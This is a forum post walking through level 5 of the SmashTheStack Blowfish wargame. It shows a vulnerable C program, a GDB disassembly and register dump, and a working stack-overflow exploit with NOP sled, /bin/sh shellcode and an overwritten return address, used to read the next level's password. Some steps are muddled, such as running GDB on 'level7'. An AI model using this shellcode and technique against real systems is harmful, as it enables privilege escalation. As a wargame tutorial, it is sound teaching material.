iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
[STS]Level 5 - Blowfish
  • chroniccommand
    Posts: 1,389
    Welcome to part five of my SmashTheStack blowfish guides.

    Preface
    In this level, we will be preforming another overflow to escalate our privileges and read from the password file. We will be going into GDB, taking apart the program, finding memory addresses, setting environment variables and so on.

    Logging in
    Now for the second part of this level. Logging in so we can actually exploit it and get to the next level. Let's SSH to our box. You should be familiar with this.

    ssh level5@blowfish.smashthestack.org -p 2222
    password: 

         1. Thou shalt NOT root or otherwise harm the box.
         2. Thou shalt NOT access any other network from this box.
         3. Thou shalt NOT use any other directory besides /tmp or /code for code. 
         4. Thou shalt give the root pass to l3thal if you manage to change it.

         Passwords are in /pass.
         There is a README in each users home directory.
         /tmp && /var/tmp will be flushed daily by cron.
         Use /code plz for umm, code ;D
         IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
         The password for the last level will get you into
         Tux, the more advanced wargame. Join #blowfish on 
         irc.smashthestack.org with any questions. 

         Admins - l3thal && cr 

         Forum: http://smashthestack.org/viewforum.php?id=10

    Last login: Thu Jan 28 23:09:50 2010 from host-84-222-52-125.cust-adsl.tiscali.it

     This level is another stack overflow in /levels/level5.
     Exploit to get the level6 pass from /pass/level6.

    So another overflow. How great. CD to the /levels directory and cat level5.c
    It should look like this:

    #include <stdio.h>
     
    int main()
    {
        char buffer[1024];
     
        if (getenv(\"VULN\") == NULL) {
            fprintf(stderr,\"Try Again!!\n\");
            exit(1); 
        }
     
        strcpy(buffer, (char *)getenv(\"VULN\"));
     
        printf(\"Environment variable VULN is:\n\\"%s\\".\n\n\", buffer);
        return 0;
    }

    So we have a buffer of 1024, and we know it's vulnerable because it's using the outdated strcpy function to copy the buffer into the address.

    Analyze it
    So now's the part where we take it apart, and find out our info. To take the program apart, we will be using GDB. GDB is a Unix decompiler. But before we take it apart, we need to overflow it. If we preform the technique we have been doing with Perl, you find it wont work :/ But, we can use a different technique, using Python. To preform python commands via terminal type this:
    python -c <code>
    So we are going to export the variable of VULN using Python via command line. Try this code:
    ./level5 export VULN=$(python -c \"print '\x90'*1040\")

    Now you may be wondering what that \x90 character is. In assembler, this means NOP(No Operation), Basically meaning nothing. So we are going to export VULN to \x90(NOP) 1040 times. Now we can analyze the code.
    To take it apart, type this
    gdb level7

    This should open up the GDB command line with ./level7
    So now we take apart the main function. Type this:
    disass main

    It should look like this:

    Dump of assembler code for function main:
    0x08048484 <main+0>:    push   ebp
    0x08048485 <main+1>:    mov    ebp,esp
    0x08048487 <main+3>:    sub    esp,0x418
    0x0804848d <main+9>:    and    esp,0xfffffff0
    0x08048490 <main+12>:    mov    eax,0x0
    0x08048495 <main+17>:    sub    esp,eax
    0x08048497 <main+19>:    mov    DWORD PTR [esp],0x8048640
    0x0804849e <main+26>:    call   0x8048364 <getenv@plt>
    0x080484a3 <main+31>:    test   eax,eax
    0x080484a5 <main+33>:    jne    0x80484c8 <main+68>
    0x080484a7 <main+35>:    mov    DWORD PTR [esp+0x4],0x8048645
    0x080484af <main+43>:    mov    eax,ds:0x804979c
    0x080484b4 <main+48>:    mov    DWORD PTR [esp],eax
    0x080484b7 <main+51>:    call   0x8048354 <fprintf@plt>
    0x080484bc <main+56>:    mov    DWORD PTR [esp],0x1
    0x080484c3 <main+63>:    call   0x8048394 <exit@plt>
    0x080484c8 <main+68>:    mov    DWORD PTR [esp],0x8048640
    0x080484cf <main+75>:    call   0x8048364 <getenv@plt>
    0x080484d4 <main+80>:    mov    DWORD PTR [esp+0x4],eax
    0x080484d8 <main+84>:    lea    eax,[ebp-0x408]
    0x080484de <main+90>:    mov    DWORD PTR [esp],eax
    0x080484e1 <main+93>:    call   0x80483a4 <strcpy@plt>
    0x080484e6 <main+98>:    lea    eax,[ebp-0x408]
    0x080484ec <main+104>:    mov    DWORD PTR [esp+0x4],eax
    0x080484f0 <main+108>:    mov    DWORD PTR [esp],0x8048660
    0x080484f7 <main+115>:    call   0x8048384 <printf@plt>
    0x080484fc <main+120>:    mov    eax,0x0
    0x08048501 <main+125>:    leave  
    0x08048502 <main+126>:    ret    
    End of assembler dump.

    If you know nothing of Assembler, this may look like nonsense to you. But if we analyze this memory address: [b]0x080484e1[/code]
    We see it's the strcpy function. So this is where we will be working. Now we set a breakpoint at that address.

    (gdb) break *0x080484e1
    Breakpoint 1 at 0x80484e1

    This is setting a breakpoint at that memory address now. Now let's take a look at the info registers.

    (gdb) i r
    eax            0xbfffd080    -1073753984
    ecx            0x4e    78
    edx            0x0    0
    ebx            0x3efff4    4128756
    esp            0xbfffd070    0xbfffd070
    ebp            0xbfffd488    0xbfffd488
    esi            0x8048510    134513936
    edi            0x80483c0    134513600
    eip            0x80484e1    0x80484e1 <main+93>
    eflags         0x246    [ PF ZF IF ]
    cs             0x73    115
    ss             0x7b    123
    ds             0x7b    123
    es             0x7b    123
    fs             0x0    0
    gs             0x33    51
    (gdb)

    As we can see we have the buffer's address in 0xbfffd080.
    If we set up the environmetal variable to a string of 1038 bytes length we overwrite the 2 first bytes of the return
    address, so we have to write our shell in 1036 bytes and after that put the buffer's address.
    Use this shell code:
    \xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh

    And then:
     export VULN=$(python -c \"print '\x90'*998 + '\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh' + '\x90\xd0\xff\xbf'\")

    And boom, we should have it ;)
    Read from /levels/level6 and you have the pass.

    --Chroniccommand
  • Xin
    Posts: 3,251
    Nice tutorial keep it up bro :)
    Xin
Add a Comment